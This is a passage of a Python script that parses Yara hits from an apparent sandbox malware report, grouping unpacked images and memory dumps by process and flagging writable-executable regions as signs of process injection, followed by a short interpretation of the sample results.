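    index: int                   # analysis process index (not the OS PID)
    image: Optional[str] = None  # learned from .unpack identifiers
    unpacked_bases: List[int] = field(default_factory=list)
    dumps: List[Tuple[int, int]] = field(default_factory=list)  # (base, protect)

    @property
    def rwx_regions(self) -> List[int]:
        """Dump bases whose protection field is writable and executable."""
        return [base for base, prot in self.dumps if prot & WRITABLE_EXEC]


def parse_yara_line(line: str) -> Optional[Tuple[str, str]]:
    m = YARA_LINE.match(line.strip())
    return (m["src"], m["kind"]) if m else None


def summarize(lines) -> Tuple[Dict[int, ProcessHits], Dict[str, List[int]]]:
    """Group Yara hits by analysis process index; collect OS PIDs per image from MEMORYSTR lines."""
    procs: Dict[int, ProcessHits] = {}
    os_pids: Dict[str, List[int]] = {}
    for line in lines:
        parsed = parse_yara_line(line)
        if parsed is None:
            continue
        src, kind = parsed
        if kind == "UNPACKEDPE" and (m := UNPACK_ID.match(src)):
            ph = procs.setdefault(int(m["idx"]), ProcessHits(int(m["idx"])))
            ph.image = m["image"]
            base = int(m["base"], 16)
            if base not in ph.unpacked_bases:
                ph.unpacked_bases.append(base)
        elif kind == "MEMORY" and (m := SDMP_ID.match(src)):
            idx = int(m["idx"], 16)  # .sdmp index is zero-padded hex; .unpack index is decimal
            ph = procs.setdefault(idx, ProcessHits(idx))
            ph.dumps.append((int(m["base"], 16), int(m["protect"], 16)))
        elif kind == "MEMORYSTR" and (m := MEMSTR_ID.match(src)):
            os_pids.setdefault(m["image"], []).append(int(m["pid"]))
    return procs, os_pids


# Lines copied from this report section.
SAMPLE_LINES = [
    "Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR",
    "Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR",
]

if __name__ == "__main__":
    procs, os_pids = summarize(SAMPLE_LINES)
    for idx, ph in sorted(procs.items()):
        print(f"[{idx:>2}] {ph.image or '?':<16} unpacked={[hex(b) for b in ph.unpacked_bases]} "
              f"dumps={[(hex(b), hex(p)) for b, p in ph.dumps]} rwx={[hex(b) for b in ph.rwx_regions]}")
    print("OS PIDs by image:", os_pids)
```

Run on these lines, the only writable executable hit is the AppLaunch.exe region (index 15, unpacked at 0x400000, dump at 0x402000 with protection 0x40), which is what one expects of a payload written into a host process rather than loaded from disk; the Vulvvmkewji.exe and Lxfrfbi.exe hits sit in 0x04 (read/write) heap regions, consistent with decrypted payloads staged in memory before injection. Index 10 has a dump but no `.unpack` identifier in this section, so its image stays unknown rather than being guessed.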